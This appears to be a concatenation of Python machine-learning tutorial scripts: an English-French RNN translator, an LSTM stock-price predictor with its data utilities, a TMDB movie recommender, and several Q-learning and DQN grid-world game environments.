preproc_english_sentences, preproc_french_sentences, english_tokenizer, french_tokenizer =\
preprocess(X, y)
max_english_sequence_length = preproc_english_sentences.shape[1]
max_french_sequence_length = preproc_french_sentences.shape[1]
english_vocab_size = len(english_tokenizer.word_index)
french_vocab_size = len(french_tokenizer.word_index)
print('Data Preprocessed')
print("Max English sentence length:", max_english_sequence_length)
print("Max French sentence length:", max_french_sequence_length)
print("English vocabulary size:", english_vocab_size)
print("French vocabulary size:", french_vocab_size)
tmp_x = pad(preproc_english_sentences, preproc_french_sentences.shape[1])
tmp_x = tmp_x.reshape((-1, preproc_french_sentences.shape[-2], 1))
print("tmp_x.shape:", tmp_x.shape)
print("preproc_french_sentences.shape:", preproc_french_sentences.shape)
# Train the neural network
# increased passed index length by 1 to avoid index error
encdec_rnn_model = create_encdec_model(
tmp_x.shape,
preproc_french_sentences.shape[1],
len(english_tokenizer.word_index)+1,
len(french_tokenizer.word_index)+1)
print(encdec_rnn_model.summary())
# reduced batch size
encdec_rnn_model.fit(tmp_x, preproc_french_sentences, batch_size=256, epochs=3, validation_split=0.2)
# Print prediction(s)
print(logits_to_text(encdec_rnn_model.predict(tmp_x[1].reshape((1, tmp_x[1].shape[0], 1, )))[0], french_tokenizer))
print("Original text and translation:")
print(X[1])
print(y[1])
# OPTIONAL: Train and Print prediction(s)
print("="*50)
# Print prediction(s)
print(logits_to_text(encdec_rnn_model.predict(tmp_x[10].reshape((1, tmp_x[1].shape[0], 1, ))[0]), french_tokenizer))
print("Original text and translation:")
print(X[10])
print(y[10])
# OPTIONAL: Train and Print prediction(s)
from tensorflow.keras.layers import LSTM, Dense, Dropout
from tensorflow.keras.callbacks import ModelCheckpoint, TensorBoard
from sklearn.metrics import mean_absolute_error, mean_squared_error, accuracy_score
import os
import time
import glob
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
from utils import classify, shift, create_model, load_data
class PricePrediction:
"""A Class utility to train and predict price of stocks/cryptocurrencies/trades
using keras model"""
def __init__(self, ticker_name, **kwargs):
"""
:param ticker_name (str): ticker name, e.g. aapl, nflx, etc.
:param n_steps (int): sequence length used to predict, default is 60
:param price_column (str): the name of column that contains price predicted, default is 'adjclose'
:param feature_columns (list): a list of feature column names used to train the model,
default is ['adjclose', 'volume', 'open', 'high', 'low']
:param target_column (str): target column name, default is 'future'
:param lookup_step (int): the future lookup step to predict, default is 1 (e.g. next day)
:param shuffle (bool): whether to shuffle the dataset, default is True
:param verbose (int): verbosity level, default is 1
==========================================
Model parameters
:param n_layers (int): number of recurrent neural network layers, default is 3
:param cell (keras.layers.RNN): RNN cell used to train keras model, default is LSTM
:param units (int): number of units of cell, default is 256
:param dropout (float): dropout rate ( from 0 to 1 ), default is 0.3
==========================================
Training parameters
:param batch_size (int): number of samples per gradient update, default is 64
:param epochs (int): number of epochs, default is 100
:param optimizer (str, keras.optimizers.Optimizer): optimizer used to train, default is 'adam'
:param loss (str, function): loss function used to minimize during training,
default is 'mae'
:param test_size (float): test size ratio from 0 to 1, default is 0.15
"""
self.ticker_name = ticker_name
self.n_steps = kwargs.get("n_steps", 60)
self.price_column = kwargs.get("price_column", 'adjclose')
self.feature_columns = kwargs.get("feature_columns", ['adjclose', 'volume', 'open', 'high', 'low'])
self.target_column = kwargs.get("target_column", "future")
self.lookup_step = kwargs.get("lookup_step", 1)
self.shuffle = kwargs.get("shuffle", True)
self.verbose = kwargs.get("verbose", 1)
self.n_layers = kwargs.get("n_layers", 3)
self.cell = kwargs.get("cell", LSTM)
self.units = kwargs.get("units", 256)
self.dropout = kwargs.get("dropout", 0.3)
self.batch_size = kwargs.get("batch_size", 64)
self.epochs = kwargs.get("epochs", 100)
self.optimizer = kwargs.get("optimizer", "adam")
self.loss = kwargs.get("loss", "mae")
self.test_size = kwargs.get("test_size", 0.15)
# create unique model name
self._update_model_name()
# runtime attributes
self.model_trained = False
self.data_loaded = False
self.model_created = False
# test price values
self.test_prices = None
# predicted price values for the test set
self.y_pred = None
# prices converted to buy/sell classes
self.classified_y_true = None
# predicted prices converted to buy/sell classes
self.classified_y_pred = None
# most recent price
self.last_price = None
# make folders if does not exist
if not os.path.isdir("results"):
os.mkdir("results")
if not os.path.isdir("logs"):
os.mkdir("logs")
if not os.path.isdir("data"):
os.mkdir("data")
def create_model(self):
"""Construct and compile the keras model"""
self.model = create_model(input_length=self.n_steps,
units=self.units,
cell=self.cell,
dropout=self.dropout,
n_layers=self.n_layers,
loss=self.loss,
optimizer=self.optimizer)
self.model_created = True
if self.verbose > 0:
print("[+] Model created")
def train(self, override=False):
"""Train the keras model using self.checkpointer and self.tensorboard as keras callbacks.
If model created already trained, this method will load the weights instead of training from scratch.
Note that this method will create the model and load data if not called before."""
# if model isn't created yet, create it
if not self.model_created:
self.create_model()
# if data isn't loaded yet, load it
if not self.data_loaded:
self.load_data()
# if the model already exists and trained, just load the weights and return
# but if override is True, then just skip loading weights
if not override:
model_name = self._model_exists()
if model_name:
self.model.load_weights(model_name)
self.model_trained = True
if self.verbose > 0:
print("[*] Model weights loaded")
return
if not os.path.isdir("results"):
os.mkdir("results")
if not os.path.isdir("logs"):
os.mkdir("logs")
model_filename = self._get_model_filename()
self.checkpointer = ModelCheckpoint(model_filename, save_best_only=True, verbose=1)
self.tensorboard = TensorBoard(log_dir=f"logs\{self.model_name}")
self.history = self.model.fit(self.X_train, self.y_train,
batch_size=self.batch_size,
epochs=self.epochs,
validation_data=(self.X_test, self.y_test),
callbacks=[self.checkpointer, self.tensorboard],
verbose=1)
self.model_trained = True
if self.verbose > 0:
print("[+] Model trained")
def predict(self, classify=False):
"""Predicts next price for the step self.lookup_step.
when classify is True, returns 0 for sell and 1 for buy"""
if not self.model_trained:
raise RuntimeError("Model is not trained yet, call model.train() first.")
# reshape to fit the model input
last_sequence = self.last_sequence.reshape((self.last_sequence.shape[1], self.last_sequence.shape[0]))
# expand dimension
last_sequence = np.expand_dims(last_sequence, axis=0)
predicted_price = self.column_scaler[self.price_column].inverse_transform(self.model.predict(last_sequence))[0][0]
if classify:
last_price = self.get_last_price()
return 1 if last_price < predicted_price else 0
else:
return predicted_price
def load_data(self):
"""Loads and preprocess data"""
filename, exists = self._df_exists()
if exists:
# if the updated dataframe already exists in disk, load it
self.ticker = pd.read_csv(filename)
ticker = self.ticker
if self.verbose > 0:
print("[*] Dataframe loaded from disk")
else:
ticker = self.ticker_name
result = load_data(ticker,n_steps=self.n_steps, lookup_step=self.lookup_step,
shuffle=self.shuffle, feature_columns=self.feature_columns,
price_column=self.price_column, test_size=self.test_size)
# extract data
self.df = result['df']
self.X_train = result['X_train']
self.X_test = result['X_test']
self.y_train = result['y_train']
self.y_test = result['y_test']
self.column_scaler = result['column_scaler']
self.last_sequence = result['last_sequence']
if self.shuffle:
self.unshuffled_X_test = result['unshuffled_X_test']
self.unshuffled_y_test = result['unshuffled_y_test']
else:
self.unshuffled_X_test = self.X_test
self.unshuffled_y_test = self.y_test
self.original_X_test = self.unshuffled_X_test.reshape((self.unshuffled_X_test.shape[0], self.unshuffled_X_test.shape[2], -1))
self.data_loaded = True
if self.verbose > 0:
print("[+] Data loaded")
# save the dataframe to disk
self.save_data()
def get_last_price(self):
"""Returns the last price ( i.e the most recent price )"""
if not self.last_price:
self.last_price = float(self.df[self.price_column].tail(1))
return self.last_price
def get_test_prices(self):
"""Returns test prices. Note that this function won't return the whole sequences,
instead, it'll return only the last value of each sequence"""
if self.test_prices is None:
current = np.squeeze(self.column_scaler[self.price_column].inverse_transform([[ v[-1][0] for v in self.original_X_test ]]))
future = np.squeeze(self.column_scaler[self.price_column].inverse_transform(np.expand_dims(self.unshuffled_y_test, axis=0)))
self.test_prices = np.array(list(current) + [future[-1]])
return self.test_prices
def get_y_pred(self):
"""Get predicted values of the testing set of sequences ( y_pred )"""
if not self.model_trained:
raise RuntimeError("Model is not trained yet, call model.train() first.")
if self.y_pred is None:
self.y_pred = np.squeeze(self.column_scaler[self.price_column].inverse_transform(self.model.predict(self.unshuffled_X_test)))
return self.y_pred
def get_y_true(self):
"""Returns original y testing values ( y_true )"""
test_prices = self.get_test_prices()
return test_prices[1:]
def _get_shifted_y_true(self):
"""Returns original y testing values shifted by -1.
This function is useful for converting to a classification problem"""
test_prices = self.get_test_prices()
return test_prices[:-1]
def _calc_classified_prices(self):
"""Convert regression predictions to a classification predictions ( buy or sell )
and set results to self.classified_y_pred for predictions and self.classified_y_true
for true prices"""
if self.classified_y_true is None or self.classified_y_pred is None:
current_prices = self._get_shifted_y_true()
future_prices = self.get_y_true()
predicted_prices = self.get_y_pred()
self.classified_y_true = list(map(classify, current_prices, future_prices))
self.classified_y_pred = list(map(classify, current_prices, predicted_prices))
# some metrics
def get_MAE(self):
"""Calculates the Mean-Absolute-Error metric of the test set"""
if not self.model_trained:
raise RuntimeError("Model is not trained yet, call model.train() first.")
y_true = self.get_y_true()
y_pred = self.get_y_pred()
return mean_absolute_error(y_true, y_pred)
def get_MSE(self):
"""Calculates the Mean-Squared-Error metric of the test set"""
if not self.model_trained:
raise RuntimeError("Model is not trained yet, call model.train() first.")
y_true = self.get_y_true()
y_pred = self.get_y_pred()
return mean_squared_error(y_true, y_pred)
def get_accuracy(self):
"""Calculates the accuracy after adding classification approach (buy/sell)"""
if not self.model_trained:
raise RuntimeError("Model is not trained yet, call model.train() first.")
self._calc_classified_prices()
return accuracy_score(self.classified_y_true, self.classified_y_pred)
def plot_test_set(self):
"""Plots test data"""
future_prices = self.get_y_true()
predicted_prices = self.get_y_pred()
plt.plot(future_prices, c='b')
plt.plot(predicted_prices, c='r')
plt.xlabel("Days")
plt.ylabel("Price")
plt.legend(["Actual Price", "Predicted Price"])
plt.show()
def save_data(self):
"""Saves the updated dataframe if it does not exist"""
filename, exists = self._df_exists()
if not exists:
self.df.to_csv(filename)
if self.verbose > 0:
print("[+] Dataframe saved")
def _update_model_name(self):
stock = self.ticker_name.replace(" ", "_")
feature_columns_str = ''.join([ c[0] for c in self.feature_columns ])
time_now = time.strftime("%Y-%m-%d")
self.model_name = f"{time_now}_{stock}-{feature_columns_str}-loss-{self.loss}-{self.cell.__name__}-seq-{self.n_steps}-step-{self.lookup_step}-layers-{self.n_layers}-units-{self.units}"
def _get_df_name(self):
"""Returns the updated dataframe name"""
time_now = time.strftime("%Y-%m-%d")
return f"data/{self.ticker_name}_{time_now}.csv"
def _df_exists(self):
"""Check if the updated dataframe exists in disk, returns a tuple contains (filename, file_exists)"""
filename = self._get_df_name()
return filename, os.path.isfile(filename)
def _get_model_filename(self):
"""Returns the relative path of this model name with h5 extension"""
return f"results/{self.model_name}.h5"
def _model_exists(self):
"""Checks if model already exists in disk, returns the filename,
returns None otherwise"""
filename = self._get_model_filename()
return filename if os.path.isfile(filename) else None
# uncomment below to use CPU instead of GPU
# import os
# os.environ["CUDA_DEVICE_ORDER"] = "PCI_BUS_ID" # see issue #152
# os.environ["CUDA_VISIBLE_DEVICES"] = "-1"
# import tensorflow as tf
# config = tf.ConfigProto(intra_op_parallelism_threads=4,
# inter_op_parallelism_threads=4,
# allow_soft_placement=True,
# device_count = {'CPU' : 1,
# 'GPU' : 0}
# )
from tensorflow.keras.layers import GRU, LSTM
from price_prediction import PricePrediction
ticker = "AAPL"
p = PricePrediction(ticker, feature_columns=['adjclose', 'volume', 'open', 'high', 'low'],
epochs=700, cell=LSTM, optimizer="rmsprop", n_layers=3, units=256,
loss="mse", shuffle=True, dropout=0.4)
p.train(True)
print(f"The next predicted price for {ticker} is {p.predict()}")
buy_sell = p.predict(classify=True)
print(f"you should {'sell' if buy_sell == 0 else 'buy'}.")
print("Mean Absolute Error:", p.get_MAE())
print("Mean Squared Error:", p.get_MSE())
print(f"Accuracy: {p.get_accuracy()*100:.3f}%")
p.plot_test_set()
from tensorflow.keras.models import Sequential
from tensorflow.keras.layers import LSTM, Dense, Dropout
from sklearn import preprocessing
from yahoo_fin import stock_info as si
from collections import deque
import pandas as pd
import numpy as np
import random
def create_model(input_length, units=256, cell=LSTM, n_layers=2, dropout=0.3, loss="mean_absolute_error", optimizer="rmsprop"):
model = Sequential()
for i in range(n_layers):
if i == 0:
# first layer
model.add(cell(units, return_sequences=True, input_shape=(None, input_length)))
model.add(Dropout(dropout))
elif i == n_layers -1:
# last layer
model.add(cell(units, return_sequences=False))
model.add(Dropout(dropout))
else:
# middle layers
model.add(cell(units, return_sequences=True))
model.add(Dropout(dropout))
model.add(Dense(1, activation="linear"))
model.compile(loss=loss, metrics=["mean_absolute_error"], optimizer=optimizer)
return model
def load_data(ticker, n_steps=60, scale=True, split=True, balance=False, shuffle=True,
lookup_step=1, test_size=0.15, price_column='Price', feature_columns=['Price'],
target_column="future", buy_sell=False):
"""Loads data from yahoo finance, if the ticker is a pd Dataframe,
it'll use it instead"""
if isinstance(ticker, str):
df = si.get_data(ticker)
elif isinstance(ticker, pd.DataFrame):
df = ticker
else:
raise TypeError("ticker can be either a str, or a pd.DataFrame instance")
result = {}
result['df'] = df.copy()
# make sure that columns passed is in the dataframe
for col in feature_columns:
assert col in df.columns
column_scaler = {}
if scale:
# scale the data ( from 0 to 1 )
for column in feature_columns:
scaler = preprocessing.MinMaxScaler()
df[column] = scaler.fit_transform(np.expand_dims(df[column].values, axis=1))
column_scaler[column] = scaler
# df[column] = preprocessing.scale(df[column].values)
# add column scaler to the result
result['column_scaler'] = column_scaler
# add future price column ( shift by -1 )
df[target_column] = df[price_column].shift(-lookup_step)
# get last feature elements ( to add them to the last sequence )
# before deleted by df.dropna
last_feature_element = np.array(df[feature_columns].tail(1))
# clean NaN entries
df.dropna(inplace=True)
if buy_sell:
# convert target column to 0 (for sell -down- ) and to 1 ( for buy -up-)
df[target_column] = list(map(classify, df[price_column], df[target_column]))
seq_data = [] # all sequences here
# sequences are made with deque, which keeps the maximum length by popping out older values as new ones come in
sequences = deque(maxlen=n_steps)
for entry, target in zip(df[feature_columns].values, df[target_column].values):
sequences.append(entry)
if len(sequences) == n_steps:
seq_data.append([np.array(sequences), target])
# get the last sequence for future predictions
last_sequence = np.array(sequences)
# shift the sequence, one element is missing ( deleted by dropna )
last_sequence = shift(last_sequence, -1)
# fill the last element
last_sequence[-1] = last_feature_element
# add last sequence to results
result['last_sequence'] = last_sequence
if buy_sell and balance:
buys, sells = [], []
for seq, target in seq_data:
if target == 0:
sells.append([seq, target])
else:
buys.append([seq, target])
# balancing the dataset
lower_length = min(len(buys), len(sells))
buys = buys[:lower_length]
sells = sells[:lower_length]
seq_data = buys + sells
if shuffle:
unshuffled_seq_data = seq_data.copy()
# shuffle data
random.shuffle(seq_data)
X, y = [], []
for seq, target in seq_data:
X.append(seq)
y.append(target)
X = np.array(X)
y = np.array(y)
if shuffle:
unshuffled_X, unshuffled_y = [], []
for seq, target in unshuffled_seq_data:
unshuffled_X.append(seq)
unshuffled_y.append(target)
unshuffled_X = np.array(unshuffled_X)
unshuffled_y = np.array(unshuffled_y)
unshuffled_X = unshuffled_X.reshape((unshuffled_X.shape[0], unshuffled_X.shape[2], unshuffled_X.shape[1]))
X = X.reshape((X.shape[0], X.shape[2], X.shape[1]))
if not split:
# return original_df, X, y, column_scaler, last_sequence
result['X'] = X
result['y'] = y
return result
else:
# split dataset into training and testing
n_samples = X.shape[0]
train_samples = int(n_samples * (1 - test_size))
result['X_train'] = X[:train_samples]
result['X_test'] = X[train_samples:]
result['y_train'] = y[:train_samples]
result['y_test'] = y[train_samples:]
if shuffle:
result['unshuffled_X_test'] = unshuffled_X[train_samples:]
result['unshuffled_y_test'] = unshuffled_y[train_samples:]
return result
# from sentdex
def classify(current, future):
if float(future) > float(current): # if the future price is higher than the current, that's a buy, or a 1
return 1
else: # otherwise... it's a 0!
return 0
def shift(arr, num, fill_value=np.nan):
result = np.empty_like(arr)
if num > 0:
result[:num] = fill_value
result[num:] = arr[:-num]
elif num < 0:
result[num:] = fill_value
result[:num] = arr[-num:]
else:
result = arr
return result
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
import seaborn as sns
from sklearn.feature_extraction.text import TfidfVectorizer
movies_path = r"E:\datasets\recommender_systems\tmdb_5000_movies.csv"
credits_path = r"E:\datasets\recommender_systems\tmdb_5000_credits.csv"
credits = pd.read_csv(credits_path)
movies = pd.read_csv(movies_path)
# rename movie_id to id to merge dataframes later
credits = credits.rename(index=str, columns={'movie_id': 'id'})
# join on movie id column
movies = movies.merge(credits, on="id")
# drop useless columns
movies = movies.drop(columns=['homepage', 'title_x', 'title_y', 'status', 'production_countries'])
# number of votes of the movie
V = movies['vote_count']
# rating average of the movie from 0 to 10
R = movies['vote_average']
# the mean vote across the whole report
C = movies['vote_average'].mean()
# minimum votes required to be listed in the top 250
m = movies['vote_count'].quantile(0.7)
movies['weighted_average'] = (V/(V+m) * R) + (m/(m+V) * C)
# ranked movies
wavg = movies.sort_values('weighted_average', ascending=False)
plt.figure(figsize=(16,6))
ax = sns.barplot(x=wavg['weighted_average'].head(10), y=wavg['original_title'].head(10), data=wavg, palette='deep')
plt.xlim(6.75, 8.35)
plt.title('"Best" Movies by TMDB Votes', weight='bold')
plt.xlabel('Weighted Average Score', weight='bold')
plt.ylabel('Movie Title', weight='bold')
plt.savefig('best_movies.png')
popular = movies.sort_values('popularity', ascending=False)
plt.figure(figsize=(16,6))
ax = sns.barplot(x=popular['popularity'].head(10), y=popular['original_title'].head(10), data=popular, palette='deep')
plt.title('"Most Popular" Movies by TMDB Votes', weight='bold')
plt.xlabel('Popularity Score', weight='bold')
plt.ylabel('Movie Title', weight='bold')
plt.savefig('popular_movies.png')
############ Content-Based ############
# filling NaNs with empty string
movies['overview'] = movies['overview'].fillna('')
tfv = TfidfVectorizer(min_df=3, max_features=None,
strip_accents='unicode', analyzer='word',token_pattern=r'\w{1,}',
ngram_range=(1, 3), use_idf=1,smooth_idf=1,sublinear_tf=1,
stop_words = 'english')
tfv_matrix = tfv.fit_transform(movies['overview'])
print(tfv_matrix.shape)
print(tfv_matrix)
import numpy as np
from PIL import Image
import cv2 # showing the env
import matplotlib.pyplot as plt
import pickle
from matplotlib import style
import time
import os
from collections.abc import Iterable
style.use("ggplot")
GRID_SIZE = 10
# how many episodes
EPISODES = 1_000
# how many steps in the env
STEPS = 200
# Rewards for differents events
MOVE_REWARD = -1
ENEMY_REWARD = -300
FOOD_REWARD = 30
epsilon = 0 # for randomness, it'll decay over time by EPSILON_DECAY
EPSILON_DECAY = 0.999993 # every episode, epsilon *= EPSILON_DECAY
SHOW_EVERY = 1
q_table = f"qtable-grid-{GRID_SIZE}-steps-{STEPS}.npy" # put here pretrained model ( if exists )
LEARNING_RATE = 0.1
DISCOUNT = 0.95
PLAYER_CODE = 1
FOOD_CODE = 2
ENEMY_CODE = 3
# blob dict, for colors
COLORS = {
PLAYER_CODE: (255, 120, 0), # blueish color
FOOD_CODE: (0, 255, 0), # green
ENEMY_CODE: (0, 0, 255), # red
}
ACTIONS = {
0: (0, 1),
1: (-1, 0),
2: (0, -1),
3: (1, 0)
}
N_ENEMIES = 2
def get_observation(cords):
obs = []
for item1 in cords:
for item2 in item1:
obs.append(item2+GRID_SIZE-1)
return tuple(obs)
class Blob:
def __init__(self, name=None):
self.x = np.random.randint(0, GRID_SIZE)
self.y = np.random.randint(0, GRID_SIZE)
self.name = name if name else "Blob"
def __sub__(self, other):
return (self.x - other.x, self.y - other.y)
def __str__(self):
return f"<{self.name.capitalize()} x={self.x}, y={self.y}>"
def move(self, x=None, y=None):
# if x is None, move randomly
if x is None:
self.x += np.random.randint(-1, 2)
else:
self.x += x
# if y is None, move randomly
if y is None:
self.y += np.random.randint(-1, 2)
else:
self.y += y
# out of bound fix
if self.x < 0:
# self.x = GRID_SIZE-1
self.x = 0
elif self.x > GRID_SIZE-1:
# self.x = 0
self.x = GRID_SIZE-1
if self.y < 0:
# self.y = GRID_SIZE-1
self.y = 0
elif self.y > GRID_SIZE-1:
# self.y = 0
self.y = GRID_SIZE-1
def take_action(self, choice):
# if choice == 0:
# self.move(x=1, y=1)
# elif choice == 1:
# self.move(x=-1, y=-1)
# elif choice == 2:
# self.move(x=-1, y=1)
# elif choice == 3:
# self.move(x=1, y=-1)
for code, (move_x, move_y) in ACTIONS.items():
if choice == code:
self.move(x=move_x, y=move_y)
# if choice == 0:
# self.move(x=1, y=0)
# elif choice == 1:
# self.move(x=0, y=1)
# elif choice == 2:
# self.move(x=-1, y=0)
# elif choice == 3:
# self.move(x=0, y=-1)
# construct the q_table if not already trained
if q_table is None or not os.path.isfile(q_table):
# q_table = {}
# # for every possible combination of the distance of the player
# # to both the food and the enemy
# for i in range(-GRID_SIZE+1, GRID_SIZE):
# for ii in range(-GRID_SIZE+1, GRID_SIZE):
# for iii in range(-GRID_SIZE+1, GRID_SIZE):
# for iiii in range(-GRID_SIZE+1, GRID_SIZE):
# q_table[(i, ii), (iii, iiii)] = np.random.uniform(-5, 0, size=len(ACTIONS))
q_table = np.random.uniform(-5, 0, size=[GRID_SIZE*2-1]*(2+2*N_ENEMIES) + [len(ACTIONS)])
else:
# the q table already exists
print("Loading Q-table")
q_table = np.load(q_table)
# this list for tracking rewards
episode_rewards = []
# game loop
for episode in range(EPISODES):
# initialize our blobs ( squares )
player = Blob("Player")
food = Blob("Food")
enemy1 = Blob("Enemy1")
enemy2 = Blob("Enemy2")
if episode % SHOW_EVERY == 0:
print(f"[{episode:05}] ep: {epsilon:.4f} reward mean: {np.mean(episode_rewards[-SHOW_EVERY:])} alpha={LEARNING_RATE}")
show = True
else:
show = False
episode_reward = 0
for i in range(STEPS):
# get the observation
obs = get_observation((player - food, player - enemy1, player - enemy2))
# Epsilon-greedy policy
if np.random.random() > epsilon:
# get the action from the q table
action = np.argmax(q_table[obs])
else:
# random action
action = np.random.randint(0, len(ACTIONS))
# take the action
player.take_action(action)
#### MAYBE ###
#enemy.move()
#food.move()
##############
food.move()
enemy1.move()
enemy2.move()
### for rewarding
if player.x == enemy1.x and player.y == enemy1.y:
# if it hit the enemy, punish
reward = ENEMY_REWARD
elif player.x == enemy2.x and player.y == enemy2.y:
# if it hit the enemy, punish
reward = ENEMY_REWARD
elif player.x == food.x and player.y == food.y:
# if it hit the food, reward
reward = FOOD_REWARD
else:
# else, punish it a little for moving
reward = MOVE_REWARD
### calculate the Q
# get the future observation after taking action
future_obs = get_observation((player - food, player - enemy1, player - enemy2))
# get the max future Q value (SarsaMax algorithm)
# SARSA = State0, Action0, Reward0, State1, Action1
max_future_q = np.max(q_table[future_obs])
# get the current Q
current_q = q_table[obs][action]
# calculate the new Q
if reward == FOOD_REWARD:
new_q = FOOD_REWARD
else:
# value iteration update
# https://en.wikipedia.org/wiki/Q-learning
# Calculate the Temporal-Difference target
td_target = reward + DISCOUNT * max_future_q
# Temporal-Difference
new_q = (1 - LEARNING_RATE) * current_q + LEARNING_RATE * td_target
# update the q
q_table[obs][action] = new_q
if show:
env = np.zeros((GRID_SIZE, GRID_SIZE, 3), dtype=np.uint8)
# set food blob to green
env[food.x][food.y] = COLORS[FOOD_CODE]
# set the enemy blob to red
env[enemy1.x][enemy1.y] = COLORS[ENEMY_CODE]
env[enemy2.x][enemy2.y] = COLORS[ENEMY_CODE]
# set the player blob to blueish
env[player.x][player.y] = COLORS[PLAYER_CODE]
# get the image
image = Image.fromarray(env, 'RGB')
image = image.resize((600, 600))
# show the image
cv2.imshow("image", np.array(image))
if reward == FOOD_REWARD or reward == ENEMY_REWARD:
if cv2.waitKey(500) == ord('q'):
break
else:
if cv2.waitKey(100) == ord('q'):
break
episode_reward += reward
if reward == FOOD_REWARD or reward == ENEMY_REWARD:
break
episode_rewards.append(episode_reward)
# decay a little randomness in each episode
epsilon *= EPSILON_DECAY
# with open(f"qtable-{int(time.time())}.pickle", "wb") as f:
# pickle.dump(q_table, f)
np.save(f"qtable-grid-{GRID_SIZE}-steps-{STEPS}", q_table)
moving_avg = np.convolve(episode_rewards, np.ones((SHOW_EVERY,))/SHOW_EVERY, mode='valid')
plt.plot([i for i in range(len(moving_avg))], moving_avg)
plt.ylabel(f"Avg Reward every {SHOW_EVERY}")
plt.xlabel("Episode")
plt.show()
import numpy as np
import gym
import random
import matplotlib.pyplot as plt
import os
import time
env = gym.make("Taxi-v2").env
# init the Q-Table
# (500x6) matrix (n_states x n_actions)
q_table = np.zeros((env.observation_space.n, env.action_space.n))
# Hyper Parameters
# alpha
LEARNING_RATE = 0.1
# gamma
DISCOUNT_RATE = 0.9
EPSILON = 0.9
EPSILON_DECAY = 0.99993
EPISODES = 100_000
SHOW_EVERY = 1_000
# for plotting metrics
all_epochs = []
all_penalties = []
all_rewards = []
for i in range(EPISODES):
# reset the env
state = env.reset()
epochs, penalties, rewards = 0, 0, []
done = False
while not done:
if random.random() < EPSILON:
# exploration
action = env.action_space.sample()
else:
# exploitation
action = np.argmax(q_table[state])
next_state, reward, done, info = env.step(action)
old_q = q_table[state, action]
future_q = np.max(q_table[next_state])
# calculate the new Q ( Q-Learning equation, i.e SARSAMAX )
new_q = (1 - LEARNING_RATE) * old_q + LEARNING_RATE * ( reward + DISCOUNT_RATE * future_q)
# update the new Q
q_table[state, action] = new_q
if reward == -10:
penalties += 1
state = next_state
epochs += 1
rewards.append(reward)
if i % SHOW_EVERY == 0:
print(f"[{i}] avg reward:{np.average(all_rewards):.4f} eps:{EPSILON:.4f}")
# env.render()
all_epochs.append(epochs)
all_penalties.append(penalties)
all_rewards.append(np.average(rewards))
EPSILON *= EPSILON_DECAY
# env.render()
# plt.plot(list(range(len(all_rewards))), all_rewards)
# plt.show()
print("Playing in 5 seconds...")
time.sleep(5)
os.system("cls") if "nt" in os.name else os.system("clear")
# render
state = env.reset()
done = False
while not done:
action = np.argmax(q_table[state])
state, reward, done, info = env.step(action)
env.render()
time.sleep(0.2)
os.system("cls") if "nt" in os.name else os.system("clear")
env.render()
import cv2
from PIL import Image
import os
# to use CPU uncomment below code
# os.environ["CUDA_DEVICE_ORDER"] = "PCI_BUS_ID" # see issue #152
# os.environ["CUDA_VISIBLE_DEVICES"] = "-1"
# import tensorflow as tf
# config = tf.ConfigProto(intra_op_parallelism_threads=5,
# inter_op_parallelism_threads=5,
# allow_soft_placement=True,
# device_count = {'CPU' : 1,
# 'GPU' : 0}
# )
import random
import gym
import numpy as np
import matplotlib.pyplot as plt
from collections import deque
from keras.models import Sequential
from keras.layers import Dense, Conv2D, MaxPooling2D, Dropout, Activation, Flatten
from keras.optimizers import Adam
EPISODES = 5_000
REPLAY_MEMORY_MAX = 20_000
MIN_REPLAY_MEMORY = 1_000
SHOW_EVERY = 50
RENDER_EVERY = 100
LEARN_EVERY = 50
GRID_SIZE = 20
ACTION_SIZE = 9
class Blob:
def __init__(self, size):
self.size = size
self.x = np.random.randint(0, size)
self.y = np.random.randint(0, size)
def __str__(self):
return f"Blob ({self.x}, {self.y})"
def __sub__(self, other):
return (self.x-other.x, self.y-other.y)
def __eq__(self, other):
return self.x == other.x and self.y == other.y
def action(self, choice):
'''
Gives us 9 total movement options. (0,1,2,3,4,5,6,7,8)
'''
if choice == 0:
self.move(x=1, y=1)
elif choice == 1:
self.move(x=-1, y=-1)
elif choice == 2:
self.move(x=-1, y=1)
elif choice == 3:
self.move(x=1, y=-1)
elif choice == 4:
self.move(x=1, y=0)
elif choice == 5:
self.move(x=-1, y=0)
elif choice == 6:
self.move(x=0, y=1)
elif choice == 7:
self.move(x=0, y=-1)
elif choice == 8:
self.move(x=0, y=0)
def move(self, x=False, y=False):
# If no value for x, move randomly
if not x:
self.x += np.random.randint(-1, 2)
else:
self.x += x
# If no value for y, move randomly
if not y:
self.y += np.random.randint(-1, 2)
else:
self.y += y
# If we are out of bounds, fix!
if self.x < 0:
self.x = 0
elif self.x > self.size-1:
self.x = self.size-1
if self.y < 0:
self.y = 0
elif self.y > self.size-1:
self.y = self.size-1
class BlobEnv:
RETURN_IMAGES = True
MOVE_PENALTY = 1
ENEMY_PENALTY = 300
FOOD_REWARD = 25
ACTION_SPACE_SIZE = 9
PLAYER_N = 1 # player key in dict
FOOD_N = 2 # food key in dict
ENEMY_N = 3 # enemy key in dict
# the dict! (colors)
d = {1: (255, 175, 0),
2: (0, 255, 0),
3: (0, 0, 255)}
def __init__(self, size):
self.SIZE = size
self.OBSERVATION_SPACE_VALUES = (self.SIZE, self.SIZE, 3) # 4
def reset(self):
self.player = Blob(self.SIZE)
self.food = Blob(self.SIZE)
while self.food == self.player:
self.food = Blob(self.SIZE)
self.enemy = Blob(self.SIZE)
while self.enemy == self.player or self.enemy == self.food:
self.enemy = Blob(self.SIZE)
self.episode_step = 0
if self.RETURN_IMAGES:
observation = np.array(self.get_image())
else:
observation = (self.player-self.food) + (self.player-self.enemy)
return observation
def step(self, action):
self.episode_step += 1
self.player.action(action)
#### MAYBE ###
#enemy.move()
#food.move()
##############
if self.RETURN_IMAGES:
new_observation = np.array(self.get_image())
else:
new_observation = (self.player-self.food) + (self.player-self.enemy)
if self.player == self.enemy:
reward = -self.ENEMY_PENALTY
done = True
elif self.player == self.food:
reward = self.FOOD_REWARD
done = True
else:
reward = -self.MOVE_PENALTY
if self.episode_step < 200:
done = False
else:
done = True
return new_observation, reward, done
def render(self):
img = self.get_image()
img = img.resize((300, 300)) # resizing so we can see our agent in all its glory.
cv2.imshow("image", np.array(img)) # show it!
cv2.waitKey(1)
# FOR CNN #
def get_image(self):
env = np.zeros((self.SIZE, self.SIZE, 3), dtype=np.uint8) # starts an rbg of our size
env[self.food.x][self.food.y] = self.d[self.FOOD_N] # sets the food location tile to green color
env[self.enemy.x][self.enemy.y] = self.d[self.ENEMY_N] # sets the enemy location to red
env[self.player.x][self.player.y] = self.d[self.PLAYER_N] # sets the player tile to blue
